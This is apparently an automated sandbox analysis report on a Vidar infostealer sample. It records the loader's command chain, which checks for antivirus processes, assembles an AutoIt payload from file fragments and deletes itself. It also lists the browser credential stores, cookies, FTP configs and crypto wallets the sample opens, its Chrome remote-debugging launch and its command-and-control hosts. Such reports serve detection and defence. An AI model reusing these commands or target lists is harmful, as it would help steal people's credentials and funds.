    Source: 6xlx4w.13.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
    Source: msedge.exe, 00000015.00000002.2982111288.000001EDF3A43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: 6xlx4w.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
    Source: 6xlx4w.13.drBinary or memory string: outlook.office.comVMware20,11696428655s
    Source: 6xlx4w.13.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
    Source: 6xlx4w.13.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
    Source: 6xlx4w.13.drBinary or memory string: AMC password management pageVMware20,11696428655
    Source: 6xlx4w.13.drBinary or memory string: tasks.office.comVMware20,11696428655o
    Source: 6xlx4w.13.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
    Source: 6xlx4w.13.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
    Source: 6xlx4w.13.drBinary or memory string: interactivebrokers.comVMware20,11696428655
    Source: 6684V5n83w.exe, 00000000.00000002.2178884292.00000000005BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: 6xlx4w.13.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
    Source: 6xlx4w.13.drBinary or memory string: dev.azure.comVMware20,11696428655j
    Source: 6xlx4w.13.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
    Source: 6xlx4w.13.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
    Source: 6xlx4w.13.drBinary or memory string: bankofamerica.comVMware20,11696428655x
    Source: 6xlx4w.13.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
    Source: 6xlx4w.13.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Focused Focused.cmd & Focused.cmdJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 330775Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E ModulesJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "however" Hotel Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 330775\Evans.com + Presentation + Univ + Gmc + Underground + Rd + Burns + Riders + Dp + Finish + Entities + Cleveland 330775\Evans.comJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Delivering + ..\Wisdom + ..\Spare + ..\Earrings + ..\Grey + ..\Bus + ..\Project lJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com Evans.com lJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com" & rd /s /q "C:\ProgramData\kno8y" & exitJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
    Source: Evans.com, 0000000D.00000000.2217240746.0000000000B83000.00000002.00000001.01000000.00000007.sdmp, Evans.com.2.dr, Entities.9.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior

    Remote Access Functionality

    barindex
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation
    1
    Registry Run Keys / Startup Folder
    12
    Process Injection
    111
    Masquerading
    2
    OS Credential Dumping
    1
    Query Registry
    Remote Services11
    Input Capture
    11
    Encrypted Channel
    Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault Accounts1
    Native API
    1
    DLL Side-Loading
    1
    Registry Run Keys / Startup Folder
    1
    Virtualization/Sandbox Evasion
    11
    Input Capture
    1
    Security Software Discovery
    Remote Desktop Protocol1
    Archive Collected Data
    1
    Remote Access Software
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading
    12
    Process Injection
    Security Account Manager1
    Virtualization/Sandbox Evasion
    SMB/Windows Admin Shares3
    Data from Local System
    1
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Deobfuscate/Decode Files or Information
    NTDS3
    Process Discovery
    Distributed Component Object Model1
    Clipboard Data
    3
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Obfuscated Files or Information
    LSA Secrets3
    File and Directory Discovery
    SSHKeylogging4
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading
    Cached Domain Credentials15
    System Information Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582695 Sample: 6684V5n83w.exe Startdate: 31/12/2024 Architecture: WINDOWS Score: 100 54 sdoout.lol 2->54 56 t.me 2->56 58 EAXdwMrdIdPn.EAXdwMrdIdPn 2->58 82 Suricata IDS alerts for network traffic 2->82 84 Multi AV Scanner detection for submitted file 2->84 86 Yara detected Vidar stealer 2->86 88 2 other signatures 2->88 10 6684V5n83w.exe 22 2->10         started        12 msedge.exe 2->12         started        signatures3 process4 process5 14 cmd.exe 2 10->14         started        18 msedge.exe 12->18         started        21 msedge.exe 12->21         started        23 msedge.exe 12->23         started        dnsIp6 52 C:\Users\user\AppData\Local\...vans.com, PE32 14->52 dropped 100 Drops PE files with a suspicious file extension 14->100 25 Evans.com 29 14->25         started        29 cmd.exe 2 14->29         started        31 cmd.exe 1 14->31         started        33 9 other processes 14->33 60 13.69.239.77, 443, 50082, 50118 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 18->60 62 20.110.205.119, 443, 50081, 50115 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 18->62 64 19 other IPs or domains 18->64 file7 signatures8 process9 dnsIp10 70 sdoout.lol 116.203.14.4, 443, 49989, 49990 HETZNER-ASDE Germany 25->70 72 t.me 149.154.167.99, 443, 49988 TELEGRAMRU United Kingdom 25->72 74 127.0.0.1 unknown unknown 25->74 92 Attempt to bypass Chrome Application-Bound Encryption 25->92 94 Tries to harvest and steal ftp login credentials 25->94 96 Tries to harvest and steal browser information (history, passwords, etc) 25->96 98 Tries to steal Crypto Currency Wallets 25->98 35 msedge.exe 2 10 25->35         started        38 chrome.exe 8 25->38         started        41 cmd.exe 25->41         started        signatures11 process12 dnsIp13 90 Monitors registry run keys for changes 35->90 43 msedge.exe 35->43         started        66 192.168.2.5, 443, 49709, 49711 unknown unknown 38->66 68 239.255.255.250 unknown Reserved 38->68 45 chrome.exe 38->45         started        48 conhost.exe 41->48         started        50 timeout.exe 41->50         started        signatures14 process15 dnsIp16 76 www.google.com 142.250.186.164, 443, 49999, 50004 GOOGLEUS United States 45->76 78 play.google.com 142.250.186.46, 443, 50016 GOOGLEUS United States 45->78 80 2 other IPs or domains 45->80

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    6684V5n83w.exe24%ReversingLabs
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://msn.comXIDv100o0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    chrome.cloudflare-dns.com
    162.159.61.3
    truefalse
      high
      sdoout.lol
      116.203.14.4
      truetrue
        unknown
        plus.l.google.com
        216.58.206.46
        truefalse
          high
          play.google.com
          142.250.186.46
          truefalse
            high
            t.me
            149.154.167.99
            truefalse
              high
              ssl.bingadsedgeextension-prod-europe.azurewebsites.net
              94.245.104.56
              truefalse
                high
                sb.scorecardresearch.com
                18.244.18.38
                truefalse
                  high
                  s-part-0017.t-0009.t-msedge.net
                  13.107.246.45
                  truefalse
                    high
                    www.google.com
                    142.250.186.164
                    truefalse
                      high
                      googlehosted.l.googleusercontent.com
                      172.217.16.129
                      truefalse
                        high
                        assets.msn.com
                        unknown
                        unknownfalse
                          high
                          c.msn.com
                          unknown
                          unknownfalse
                            high
                            ntp.msn.com
                            unknown
                            unknownfalse
                              high
                              clients2.googleusercontent.com
                              unknown
                              unknownfalse
                                high
                                bzib.nelreports.net
                                unknown
                                unknownfalse
                                  high
                                  apis.google.com
                                  unknown
                                  unknownfalse
                                    high
                                    EAXdwMrdIdPn.EAXdwMrdIdPn
                                    unknown
                                    unknownfalse
                                      unknown
                                      api.msn.com
                                      unknown
                                      unknownfalse
                                        high
                                        NameMaliciousAntivirus DetectionReputation
                                        https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735634793754&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                          high
                                          https://sb.scorecardresearch.com/b?rn=1735634793756&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=05F9EFDB33DC678B1BFFFABD3256667F&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                            high
                                            https://t.me/w211etfalse
                                              high
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabchrome.exe, 00000011.00000003.2793657944.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788298037.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814485401.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815410251.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, Web Data.23.dr, lxlxt0.13.dr, 6xlx4w.13.drfalse
                                                high
                                                https://mail.google.com/mail/?usp=installed_webappchrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://google-ohttp-relay-join.fastly-edge.com/)chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://google-ohttp-relay-join.fastly-edge.com/(chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://duckduckgo.com/ac/?q=Web Data.23.dr, lxlxt0.13.dr, 6xlx4w.13.drfalse
                                                        high
                                                        https://google-ohttp-relay-join.fastly-edge.com//chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://google-ohttp-relay-join.fastly-edge.com/3chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://google-ohttp-relay-join.fastly-edge.com/2chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://google-ohttp-relay-join.fastly-edge.com/0chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ntp.msn.com/0000003.log9.23.drfalse
                                                                    high
                                                                    https://docs.google.com/document/Jchrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://anglebug.com/4633chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://anglebug.com/7382chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.aieukn.13.drfalse
                                                                            high
